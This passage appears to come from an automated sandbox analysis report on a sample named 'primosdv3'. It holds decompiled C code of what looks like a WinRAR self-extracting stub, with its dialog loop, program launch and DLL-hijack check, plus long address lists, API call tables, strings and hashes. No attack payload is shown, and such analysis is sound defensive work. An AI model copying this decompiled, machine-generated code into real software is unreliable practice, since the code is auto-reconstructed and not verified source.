						 *0xcc1cbd = _t152 & 0xffffff00 |  *0xcc1cbd == 0x00000000;
						SetDlgItemTextW(_t311, 1, E00C6E617(((_t152 & 0xffffff00 |  *0xcc1cbd == 0x00000000) & 0x000000ff) + 0xe6));
						while(1) {
							__eflags =  *0xcc1cbd;
							if( *0xcc1cbd == 0) {
								goto L128;
							}
							__eflags =  *0xca8454;
							if( *0xca8454 != 0) {
								goto L128;
							}
							_t278 = GetMessageW(_t328 - 0x74, 0, 0, 0);
							__eflags = _t278;
							if(_t278 == 0) {
								goto L128;
							} else {
								_t280 = IsDialogMessageW(_t311, _t328 - 0x74);
								__eflags = _t280;
								if(_t280 == 0) {
									TranslateMessage(_t328 - 0x74);
									DispatchMessageW(_t328 - 0x74);
								}
								continue;
							}
						}
						goto L128;
					}
				}
				_t285 = _t152 - 1;
				if(_t285 == 0) {
					__eflags =  *0xca844c;
					 *0xca8454 = 1;
					if( *0xca844c == 0) {
						goto L11;
					}
					__eflags =  *0xca845c;
					if( *0xca845c != 0) {
						goto L128;
					}
					goto L11;
				}
				if(_t285 == 0x65) {
					_push(0x800);
					_t289 = E00C6124F(_t311, E00C6E617(0x64), _t328 - 0x1474);
					__eflags = _t289;
					if(_t289 == 0) {
						goto L128;
					} else {
						_push(_t328 - 0x1474);
						_push(0x66);
						goto L127;
					}
				}
				goto L6;
			}

0x00c7b7e0
0x00c7b7e0
0x00c7b7e5
0x00c7b7ef
0x00c7b7f6
0x00c7b7fa
0x00c7b80e
0x00c7b815
0x00c7b818
0x00c7c203
0x00c7c203
0x00c7c205
0x00c7c20b
0x00c7c213
0x00c7c213
0x00c7b81e
0x00c7b824
0x00c7bf0f
0x00c7bf10
0x00c7bf15
0x00c7bf1a
0x00c7bf20
0x00c7bf26
0x00c7bf28
0x00c7bf32
0x00c7bf32
0x00c7bf38
0x00c7bf3d
0x00c7bf3f
0x00c7bf4c
0x00c7bf4c
0x00c7bf55
0x00c7bf68
0x00c7bf6b
0x00c7bf7d
0x00c7bf85
0x00c7bf8b
0x00c7bf93
0x00c7bf95
0x00c7bf98
0x00c7bf9d
0x00c7bf9f
0x00c7bf9f
0x00c7bfa7
0x00c7bfae
0x00c7bfb3
0x00c7bfb8
0x00c7bfbd
0x00c7bfc2
0x00c7bfc3
0x00c7bfca
0x00c7bfcf
0x00c7bfd1
0x00c7bfd3
0x00c7bfd3
0x00c7bfd9
0x00c7bfe0
0x00c7bfe2
0x00c7bfe4
0x00c7bfea
0x00c7bfeb
0x00c7bfeb
0x00c7bff0
0x00c7bff7
0x00c7c007
0x00c7c01a
0x00c7c01a
0x00c7c020
0x00c7c027
0x00c7c0d8
0x00c7c0d8
0x00c7c0df
0x00c7c18b
0x00c7c18b
0x00c7c192
0x00c7c197
0x00c7c197
0x00c7c19d
0x00c7c1a4
0x00c7c1ab
0x00c7c1b5
0x00c7c1b5
0x00c7c1ba
0x00c7c1bf
0x00c7c1c1
0x00c7c1c3
0x00c7c1ca
0x00c7c1cc
0x00c7c1ce
0x00c7c1cf
0x00c7c1d4
0x00c7c1d5
0x00c7c1d7
0x00c7c1e1
0x00c7c1d9
0x00c7c1d9
0x00c7c1d9
0x00c7c1d7
0x00c7c1ca
0x00c7c1e7
0x00c7c1ee
0x00c7c1fa
0x00c7c1fb
0x00c7c1fc
0x00c7c1fd
0x00c7c1fd
0x00000000
0x00c7c1ee
0x00c7c0e5
0x00c7c0ec
0x00000000
0x00000000
0x00c7c0f2
0x00c7c0f9
0x00000000
0x00000000
0x00c7c0ff
0x00c7c101
0x00c7c106
0x00c7c106
0x00c7c10d
0x00c7c10d
0x00c7c10d
0x00c7c10d
0x00c7c113
0x00000000
0x00000000
0x00c7c115
0x00c7c11c
0x00000000
0x00000000
0x00c7c11e
0x00c7c11e
0x00c7c124
0x00c7c132
0x00c7c143
0x00c7c15b
0x00000000
0x00c7c15b
0x00c7c126
0x00c7c12d
0x00000000
0x00000000
0x00c7c12f
0x00c7c12f
0x00c7c160
0x00c7c161
0x00c7c161
0x00c7c169
0x00c7c183
0x00c7c188
0x00000000
0x00c7c02d
0x00c7c02d
0x00c7c02f
0x00c7c035
0x00c7c036
0x00c7c03b
0x00c7c040
0x00c7c042
0x00c7c044
0x00c7c04b
0x00c7c04d
0x00c7c061
0x00c7c06c
0x00c7c071
0x00c7c04b
0x00c7c072
0x00c7c078
0x00c7c0cb
0x00c7c0cb
0x00c7c0cc
0x00c7c0d2
0x00c7c0d3
0x00000000
0x00c7c07a
0x00c7c07b
0x00c7c081
0x00c7c087
0x00000000
0x00000000
0x00c7c089
0x00c7c090
0x00000000
0x00000000
0x00c7c092
0x00c7c094
0x00c7c09a
0x00c7c09b
0x00c7c0a0
0x00c7c0a7
0x00000000
0x00000000
0x00c7c0bd
0x00c7c0c3
0x00c7c0c5
0x00c7b958
0x00c7b958
0x00c7b95e
0x00c7b95e
0x00c7b95f
0x00c7b960
0x00000000
0x00c7b960
0x00000000
0x00c7c0c5
0x00c7c078
0x00c7c027
0x00c7b82c
0x00c7b841
0x00c7b841
0x00000000
0x00c7b841
0x00c7b834
0x00c7b836
0x00c7b89b
0x00c7b8a2
0x00c7b92e
0x00c7b93d
0x00c7b943
0x00c7b94a
0x00c7b96b
0x00c7b972
0x00c7b983
0x00c7b989
0x00c7b990
0x00c7b992
0x00c7b99e
0x00c7b9b1
0x00c7b9b1
0x00c7b9b8
0x00c7b9be
0x00c7b9c5
0x00c7b9e0
0x00c7b9f4
0x00c7ba01
0x00c7ba24
0x00c7ba29
0x00c7ba32
0x00c7ba33
0x00c7ba35
0x00c7b9c7
0x00c7b9d1
0x00c7b9d2
0x00c7b9d4
0x00c7b9d9
0x00c7b9d9
0x00c7ba3a
0x00c7ba41
0x00c7ba4a
0x00c7ba4a
0x00c7ba53
0x00c7ba5f
0x00c7ba64
0x00c7ba66
0x00c7ba7b
0x00c7ba87
0x00c7ba89
0x00c7ba8c
0x00c7ba8e
0x00c7ba90
0x00c7ba96
0x00c7ba99
0x00c7ba9c
0x00c7ba9e
0x00c7ba9e
0x00c7ba9c
0x00c7baa1
0x00c7baa6
0x00c7baa8
0x00c7bb16
0x00c7bb16
0x00c7bb1a
0x00c7bd5b
0x00c7bd61
0x00c7bd6b
0x00c7bd7d
0x00c7bd87
0x00c7bd94
0x00c7bda3
0x00c7bda5
0x00c7bda7
0x00c7bdb2
0x00c7bdb2
0x00c7bdbb
0x00c7bdbb
0x00c7bdc1
0x00c7bdc3
0x00c7bdc9
0x00c7bdca
0x00c7bdcf
0x00c7bdd1
0x00c7bdd7
0x00c7bdd8
0x00c7bddd
0x00c7bde2
0x00c7bde3
0x00c7bde9
0x00c7bdee
0x00c7bdf0
0x00c7bdf6
0x00c7bdfd
0x00c7bdfe
0x00c7be03
0x00c7be0a
0x00c7be0c
0x00c7be13
0x00c7be15
0x00c7be1c
0x00c7be1e
0x00c7be20
0x00c7be26
0x00c7be27
0x00c7be27
0x00c7be1c
0x00c7be13
0x00c7be2f
0x00c7be34
0x00c7be34
0x00c7be3b
0x00000000
0x00c7be3b
0x00c7bb20
0x00c7bb22
0x00000000
0x00000000
0x00000000
0x00c7baaa
0x00c7baaa
0x00c7baac
0x00c7bb28
0x00c7bb28
0x00c7bb2b
0x00c7bb2d
0x00c7bb31
0x00c7bb33
0x00c7bcf1
0x00c7bcf1
0x00c7bcf5
0x00c7b894
0x00c7b894
0x00000000
0x00c7b894
0x00c7bcfb
0x00c7bd05
0x00c7bd1e
0x00c7bd2c
0x00c7bd46
0x00c7bd4b
0x00000000
0x00c7bd4b
0x00c7bb43
0x00c7bb5a
0x00c7bb5f
0x00c7bb7c
0x00c7bb81
0x00c7bb84
0x00c7bb91
0x00c7bb98
0x00c7bba1
0x00c7bbb9
0x00c7bbbc
0x00c7bbc3
0x00c7bbc6
0x00c7bbc9
0x00c7bbd6
0x00c7bbd8
0x00c7bbdb
0x00c7bbdd
0x00c7bc68
0x00c7bbe3
0x00c7bbe3
0x00c7bbea
0x00c7bbf0
0x00c7bbf2
0x00c7bbff
0x00c7bbff
0x00c7bc0b
0x00c7bc17
0x00c7bc23
0x00c7bc2e
0x00c7bc3a
0x00c7bc58
0x00c7bc5b
0x00c7bc60
0x00c7bc60
0x00c7bc6f
0x00c7bc83
0x00c7bc94
0x00c7bc99
0x00c7bc9b
0x00c7bcd5
0x00c7bcd8
0x00000000
0x00c7bc9d
0x00c7bca5
0x00c7bcab
0x00c7bcab
0x00c7bcab
0x00c7bcaf
0x00c7bcb2
0x00c7bcb2
0x00c7bcb5
0x00000000
0x00000000
0x00c7bcb9
0x00c7bcc2
0x00c7bcc3
0x00c7bcc6
0x00c7bcc9
0x00000000
0x00000000
0x00000000
0x00c7bcc9
0x00c7bcce
0x00c7bcdb
0x00c7bcdb
0x00c7bcdf
0x00c7bce2
0x00c7bceb
0x00c7bceb
0x00000000
0x00c7bcdf
0x00c7bc9b
0x00c7bac2
0x00c7bac7
0x00c7bad0
0x00c7bad5
0x00c7bae8
0x00c7baed
0x00c7baf0
0x00c7baf2
0x00c7baf4
0x00c7bafa
0x00c7bafd
0x00c7baff
0x00c7baff
0x00c7bafd
0x00c7bb02
0x00c7bb02
0x00c7bb02
0x00c7bb06
0x00c7bb0c
0x00c7bb11
0x00000000
0x00c7bb11
0x00c7ba68
0x00c7ba68
0x00c7ba6e
0x00c7ba71
0x00c7ba78
0x00c7ba78
0x00000000
0x00c7ba78
0x00c7ba73
0x00c7ba76
0x00000000
0x00000000
0x00000000
0x00c7ba76
0x00c7b974
0x00c7b974
0x00c7b976
0x00c7be40
0x00c7be40
0x00c7be47
0x00000000
0x00000000
0x00c7be4d
0x00c7be4f
0x00000000
0x00000000
0x00c7be5a
0x00c7be68
0x00c7be6e
0x00c7be74
0x00c7be77
0x00c7be82
0x00c7be8c
0x00c7be8c
0x00c7be79
0x00c7be79
0x00c7be79
0x00c7bea4
0x00c7bea9
0x00c7beac
0x00c7beae
0x00c7beb5
0x00c7bebe
0x00c7becb
0x00c7bed6
0x00c7bee8
0x00c7beed
0x00c7beb5
0x00c7bf05
0x00000000
0x00c7bf05
0x00c7b972
0x00c7b94e
0x00c7b94f
0x00c7b956
0x00000000
0x00000000
0x00000000
0x00c7b956
0x00c7b8a8
0x00c7b8af
0x00000000
0x00c7b8b1
0x00c7b8b1
0x00c7b8bb
0x00c7b8d1
0x00c7b920
0x00c7b920
0x00c7b927
0x00c7b929
0x00c7b929
0x00c7b8d9
0x00c7b8e0
0x00000000
0x00000000
0x00c7b8ef
0x00c7b8f5
0x00c7b8f7
0x00000000
0x00c7b8fd
0x00c7b902
0x00c7b908
0x00c7b90a
0x00c7b910
0x00c7b91a
0x00c7b91a
0x00000000
0x00c7b90a
0x00c7b8f7
0x00000000
0x00c7b920
0x00c7b8af
0x00c7b838
0x00c7b83a
0x00c7b878
0x00c7b87f
0x00c7b885
0x00000000
0x00000000
0x00c7b887
0x00c7b88e
0x00000000
0x00000000
0x00000000
0x00c7b88e
0x00c7b83f
0x00c7b848
0x00c7b85d
0x00c7b862
0x00c7b864
0x00000000
0x00c7b86a
0x00c7b870
0x00c7b871
0x00000000
0x00c7b871
0x00c7b864
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00C7B7E5

Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00C7B8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7B8EF
IsDialogMessageW.USER32(?,?), ref: 00C7B902
TranslateMessage.USER32(?), ref: 00C7B910
DispatchMessageW.USER32(?), ref: 00C7B91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00C7B93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00C7B960
GetDlgItem.USER32(?,00000068), ref: 00C7B983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00C7B99E
SendMessageW.USER32(00000000,000000C2,00000000,00C935F4), ref: 00C7B9B1

Part of subcall function 00C7D453: _wcslen.LIBCMT ref: 00C7D47D

SetFocus.USER32(00000000), ref: 00C7B9B8
_swprintf.LIBCMT ref: 00C7BA24

Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5

Part of subcall function 00C7D4D4: GetDlgItem.USER32(00000068,00CBFCB8), ref: 00C7D4E8
Part of subcall function 00C7D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00C7AF07,00000001,?,?,00C7B7B9,00C9506C,00CBFCB8,00CBFCB8,00001000,00000000,00000000), ref: 00C7D510
Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00C7D51B
Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00C935F4), ref: 00C7D529
Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C7D53F
Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00C7D559
Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C7D59D
Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00C7D5AB
Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C7D5BA
Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C7D5E1
Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00C943F4), ref: 00C7D5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00C7BA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00C7BA90
GetTickCount.KERNEL32 ref: 00C7BAAE
_swprintf.LIBCMT ref: 00C7BAC2
GetLastError.KERNEL32(?,00000011), ref: 00C7BAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00C7BB43
_swprintf.LIBCMT ref: 00C7BB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00C7BBD0
GetCommandLineW.KERNEL32 ref: 00C7BBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00C7BC47
ShellExecuteExW.SHELL32(0000003C), ref: 00C7BC6F
Sleep.KERNEL32(00000064), ref: 00C7BCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00C7BCE2
CloseHandle.KERNEL32(00000000), ref: 00C7BCEB
_swprintf.LIBCMT ref: 00C7BD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00C7BD7D
SetDlgItemTextW.USER32(?,00000065,00C935F4), ref: 00C7BD94
GetDlgItem.USER32(?,00000065), ref: 00C7BD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 00C7BDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C7BDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00C7BE68
_wcslen.LIBCMT ref: 00C7BEBE
_swprintf.LIBCMT ref: 00C7BEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 00C7BF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00C7BF4C
GetDlgItem.USER32(?,00000068), ref: 00C7BF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00C7BF6B
GetDlgItem.USER32(?,00000066), ref: 00C7BF85
SetWindowTextW.USER32(00000000,00CAA472), ref: 00C7BFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00C7C007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00C7C01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00C7C0BD
EnableWindow.USER32(00000000,00000000), ref: 00C7C197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00C7C1D9

Part of subcall function 00C7C73F: __EH_prolog.LIBCMT ref: 00C7C744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00C7C1FD

Strings

%s, xrefs: 00C7BED8
C:\Users\user\Desktop, xrefs: 00C7BBC9
<, xrefs: 00C7BB84
winrarsfxmappingfile.tmp, xrefs: 00C7BBA6
"%s"%s, xrefs: 00C7BD0D
__tmp_rar_sfx_access_check_%u, xrefs: 00C7BAB5
@, xrefs: 00C7BB91
-el -s2 "-d%s" "-sp%s", xrefs: 00C7BB6B
LICENSEDLG, xrefs: 00C7C0B2
STARTDLG, xrefs: 00C7B801

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-3883326805
Opcode ID: af90e14f3ab0aff1a7572b39c56af995960c23472506e08738d284441a0fdaf9
Instruction ID: 23e4cf337df9b89b8d5fdd05ad6d542d316cb5a6bfa382728fcb5d8832befaf3
Opcode Fuzzy Hash: af90e14f3ab0aff1a7572b39c56af995960c23472506e08738d284441a0fdaf9
Instruction Fuzzy Hash: 51422871944249BFEB21AB70DC8AFBE3B7CAB06704F048059F659A61D2CB749F44DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00C70863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00C70863(void* __edx, char _a3, long _a4, short* _a8, short* _a12, short* _a16, short* _a20, short* _a24, short* _a28, short* _a32, short* _a36, short* _a40, short* _a44, short* _a48, short* _a52, short* _a56, short* _a60, short* _a64, short* _a68, short* _a72, short* _a76, short* _a80, short* _a84, short* _a88, short* _a92, short* _a96, short* _a100, short* _a104, short* _a108, short* _a112, short* _a116, short* _a120, short* _a124, short* _a128, short* _a132, short* _a136, short* _a140, short* _a144, short* _a148, short* _a152, short* _a156, short* _a160, short* _a164, short* _a168, short* _a172, short* _a176, short* _a180, short* _a184, short* _a188, short* _a192, short* _a196, short* _a200, short* _a204, short* _a208, short* _a212, short* _a216, short* _a220, short* _a224, short* _a228, short* _a232, short* _a236, short* _a240, short* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
				char _v1;
				long _v4;
				char* _t111;
				int _t122;
				long _t133;
				void* _t149;
				_Unknown_base(*)()* _t168;
				struct _OVERLAPPED* _t174;
				struct _OVERLAPPED* _t175;
				signed char _t176;
				_Unknown_base(*)()* _t177;
				struct _OVERLAPPED* _t189;
				long _t190;
				void* _t191;
				_Unknown_base(*)()* _t192;
				struct HINSTANCE__* _t193;
				signed int _t195;
				struct _OVERLAPPED* _t196;
				signed int _t197;
				void* _t198;
				_Unknown_base(*)()* _t199;
				signed int _t200;
				int _t201;
				void* _t202;

				E00C7EC50(0xb3cc);
				_t174 = 0;
				_a3 = 0;
				_t193 = GetModuleHandleW(L"kernel32");
				if(_t193 != 0) {
					_t168 = GetProcAddress(_t193, "SetDllDirectoryW");
					_t176 = _a46032;
					_t192 = _t168;
					if(_t192 != 0) {
						asm("sbb ecx, ecx");
						_t177 = _t192;
						 *0xc93278( ~(_t176 & 0x000000ff) & 0x00c935f4);
						 *_t192();
					}
					_t199 = GetProcAddress(_t193, "SetDefaultDllDirectories");
					if(_t199 != 0) {
						_t177 = _t199;
						 *0xc93278((_t176 & 0x000000ff ^ 0x00000001) + 1 << 0xb);
						 *_t199();
						_v1 = 1;
					}
					_t174 = 0;
				}
				_t111 =  *0xc9e1a4; // 0xc93c2c
				_t201 = _t200 | 0xffffffff;
				_a8 = L"version.dll";
				_t194 = 0x800;
				_a12 = L"DXGIDebug.dll";
				_a16 = L"sfc_os.dll";
				_a20 = L"SSPICLI.DLL";
				_a24 = L"rsaenh.dll";
				_a28 = L"UXTheme.dll";
				_a32 = L"dwmapi.dll";
				_a36 = L"cryptbase.dll";
				_a40 = L"lpk.dll";
				_a44 = L"usp10.dll";
				_a48 = L"clbcatq.dll";
				_a52 = L"comres.dll";
				_a56 = L"ws2_32.dll";
				_a60 = L"ws2help.dll";
				_a64 = L"psapi.dll";
				_a68 = L"ieframe.dll";
				_a72 = L"ntshrui.dll";
				_a76 = L"atl.dll";
				_a80 = L"setupapi.dll";
				_a84 = L"apphelp.dll";
				_a88 = L"userenv.dll";
				_a92 = L"netapi32.dll";
				_a96 = L"shdocvw.dll";
				_a100 = L"crypt32.dll";
				_a104 = L"msasn1.dll";
				_a108 = L"cryptui.dll";
				_a112 = L"wintrust.dll";
				_a116 = L"shell32.dll";
				_a120 = L"secur32.dll";
				_a124 = L"cabinet.dll";
				_a128 = L"oleaccrc.dll";
				_a132 = L"ntmarta.dll";
				_a136 = L"profapi.dll";
				_a140 = L"WindowsCodecs.dll";
				_a144 = L"srvcli.dll";
				_a148 = L"cscapi.dll";
				_a152 = L"slc.dll";
				_a156 = L"imageres.dll";
				_a160 = L"dnsapi.DLL";
				_a164 = L"iphlpapi.DLL";
				_a168 = L"WINNSI.DLL";
				_a172 = L"netutils.dll";
				_a176 = L"mpr.dll";
				_a180 = L"devrtl.dll";
				_a184 = L"propsys.dll";
				_a188 = L"mlang.dll";
				_a192 = L"samcli.dll";
				_a196 = L"samlib.dll";
				_a200 = L"wkscli.dll";
				_a204 = L"dfscli.dll";
				_a208 = L"browcli.dll";
				_a212 = L"rasadhlp.dll";
				_a216 = L"dhcpcsvc6.dll";
				_a220 = L"dhcpcsvc.dll";
				_a224 = L"XmlLite.dll";
				_a228 = L"linkinfo.dll";
				_a232 = L"cryptsp.dll";
				_a236 = L"RpcRtRemote.dll";
				_a240 = L"aclui.dll";
				_a244 = L"dsrole.dll";
				_a248 = L"peerdist.dll";
				if( *_t111 == 0x78) {
					L15:
					GetModuleFileNameW(_t174,  &_a772, _t194);
					E00C70602( &_a9160, E00C6C29A(_t215,  &_a772), _t194);
					_t189 = _t174;
					do {
						_t195 = _t174;
						if(E00C6B146() < 0x600) {
							L19:
							_t196 =  *(_t202 + 0x18 + _t195 * 4);
							_push(0x800);
							E00C6C310(_t218,  &_a772, _t196);
							_t122 = GetFileAttributesW( &_a760); // executed
							if(_t122 != _t201) {
								_t189 = _t196;
								L23:
								if(_v1 != 0) {
									L29:
									_t225 = _t189;
									if(_t189 == 0) {
										return _t122;
									}
									E00C6C2E4(_t225,  &_a768);
									if(E00C6B146() < 0x600) {
										_push( &_a9160);
										_push( &_a768);
										E00C64092( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t189);
										_t202 = _t202 + 0x18;
										_t122 = AllocConsole();
										__eflags = _t122;
										if(_t122 != 0) {
											__imp__AttachConsole(GetCurrentProcessId());
											_t133 = E00C83E13( &_a4860);
											WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t133,  &_v4, 0);
											Sleep(0x2710);
											_t122 = FreeConsole();
										}
									} else {
										E00C7081B(L"dwmapi.dll");
										E00C7081B(L"uxtheme.dll");
										_push( &_a9152);
										_push( &_a760);
										E00C64092( &_a4852, 0x864, E00C6E617(0xf1), _t189);
										_t202 = _t202 + 0x18;
										_t122 = E00C7A7E4(0,  &_a4848, E00C6E617(0xf0), 0x30);
									}
									ExitProcess(0);
								}
								_t197 = 0;
								while(1) {
									_t175 =  *(_t202 + 0x38 + _t197 * 4);
									_push(0x800);
									E00C6C310(0,  &_a768, _t175);
									_t122 = GetFileAttributesW( &_a756);
									if(_t122 != _t201) {
										break;
									}
									_t197 = _t197 + 1;
									if(_t197 < 0x35) {
										continue;
									}
									goto L29;
								}
								_t189 = _t175;
								goto L29;
							}
							goto L20;
						}
						_t149 = E00C7081B( *(_t202 + 0x18 + _t195 * 4)); // executed
						if(_t149 == 0) {
							goto L19;
						}
						_t122 = CompareStringW(0x400, 0x1001,  *(_t202 + 0x24 + _t195 * 4), _t201, L"DXGIDebug.dll", _t201); // executed
						_t218 = _t122 - 2;
						if(_t122 != 2) {
							goto L20;
						}
						goto L19;
						L20:
						_t174 =  &(_t174->Internal);
					} while (_t174 < 8);
					goto L23;
				} else {
					_t190 = E00C875FB(_t177, _t111);
					if(_t190 == 0) {
						goto L15;
					}
					GetModuleFileNameW(_t174,  &_a4868, 0x800);
					_t198 = CreateFileW( &_a4868, 0x80000000, 1, _t174, 3, _t174, _t174);
					if(_t198 == _t201 || SetFilePointer(_t198, _t190, _t174, _t174) != _t190 || ReadFile(_t198,  &_a13260, 0x7ffe,  &_a4, _t174) == 0) {
						L14:
						CloseHandle(_t198);
						_t194 = 0x800;
						goto L15;
					} else {
						_push(0x104);
						 *((short*)(_t202 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
						_push( &_a252);
						_push( &_a13260);
						while(1) {
							_t191 = E00C70371();
							_t215 = _t191;
							if(_t191 == 0) {
								goto L14;
							}
							E00C7081B( &_a252);
							_push(0x104);
							_push( &_a248);
							_push(_t191);
						}
						goto L14;
					}
				}
			}

0x00c70868
0x00c70871
0x00c70878
0x00c70882
0x00c70886
0x00c7088e
0x00c70894
0x00c7089b
0x00c7089f
0x00c708a6
0x00c708af
0x00c708b1
0x00c708b7
0x00c708b7
0x00c708c5
0x00c708c9
0x00c708d6
0x00c708d8
0x00c708de
0x00c708e0
0x00c708e0
0x00c708e5
0x00c708e5
0x00c708e7
0x00c708ec
0x00c708ef
0x00c708f7
0x00c708fc
0x00c70904
0x00c7090f
0x00c70917
0x00c7091f
0x00c70927
0x00c7092f
0x00c70937
0x00c7093f
0x00c70947
0x00c7094f
0x00c70957
0x00c7095f
0x00c70967
0x00c7096f
0x00c70977
0x00c7097f
0x00c70987
0x00c7098f
0x00c70997
0x00c7099f
0x00c709a7
0x00c709af
0x00c709b7
0x00c709bf
0x00c709c7
0x00c709d2
0x00c709dd
0x00c709e8
0x00c709f3
0x00c709fe
0x00c70a09
0x00c70a14
0x00c70a1f
0x00c70a2a
0x00c70a35
0x00c70a40
0x00c70a4b
0x00c70a56
0x00c70a61
0x00c70a6c
0x00c70a77
0x00c70a82
0x00c70a8d
0x00c70a98
0x00c70aa3
0x00c70aae
0x00c70ab9
0x00c70ac4
0x00c70acf
0x00c70ada
0x00c70ae5
0x00c70af0
0x00c70afb
0x00c70b06
0x00c70b11
0x00c70b1c
0x00c70b27
0x00c70b32
0x00c70b3d
0x00c70b48
0x00c70c14
0x00c70c1e
0x00c70c3b
0x00c70c40
0x00c70c42
0x00c70c42
0x00c70c4e
0x00c70c7d
0x00c70c7d
0x00c70c88
0x00c70c8f
0x00c70c9c
0x00c70ca4
0x00c70cae
0x00c70cb0
0x00c70cb5
0x00c70cec
0x00c70cec
0x00c70cee
0x00c70e05
0x00c70e05
0x00c70cfc
0x00c70d0b
0x00c70d7a
0x00c70d82
0x00c70d96
0x00c70d9b
0x00c70d9e
0x00c70da4
0x00c70da6
0x00c70daf
0x00c70dc4
0x00c70ddc
0x00c70de7
0x00c70ded
0x00c70ded
0x00c70d0d
0x00c70d12
0x00c70d1c
0x00c70d28
0x00c70d30
0x00c70d4a
0x00c70d4f
0x00c70d69
0x00c70d69
0x00c70df5
0x00c70df5
0x00c70cb7
0x00c70cb9
0x00c70cb9
0x00c70cc4
0x00c70ccb
0x00c70cd8
0x00c70ce0
0x00000000
0x00000000
0x00c70ce2
0x00c70ce6
0x00000000
0x00000000
0x00000000
0x00c70ce8
0x00c70cea
0x00000000
0x00c70cea
0x00000000
0x00c70ca4
0x00c70c54
0x00c70c5b
0x00000000
0x00000000
0x00c70c72
0x00c70c78
0x00c70c7b
0x00000000
0x00000000
0x00000000
0x00c70ca6
0x00c70ca6
0x00c70ca7
0x00000000
0x00c70b4e
0x00c70b54
0x00c70b59
0x00000000
0x00000000
0x00c70b69
0x00c70b89
0x00c70b8d
0x00c70c08
0x00c70c09
0x00c70c0f
0x00000000
0x00c70bbb
0x00c70bc3
0x00c70bc8
0x00c70bd7
0x00c70bdf
0x00c70bfd
0x00c70c02
0x00c70c04
0x00c70c06
0x00000000
0x00000000
0x00c70bea
0x00c70bef
0x00c70bfb
0x00c70bfc
0x00c70bfc
0x00000000
0x00c70bfd
0x00c70b8d

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00C7087C
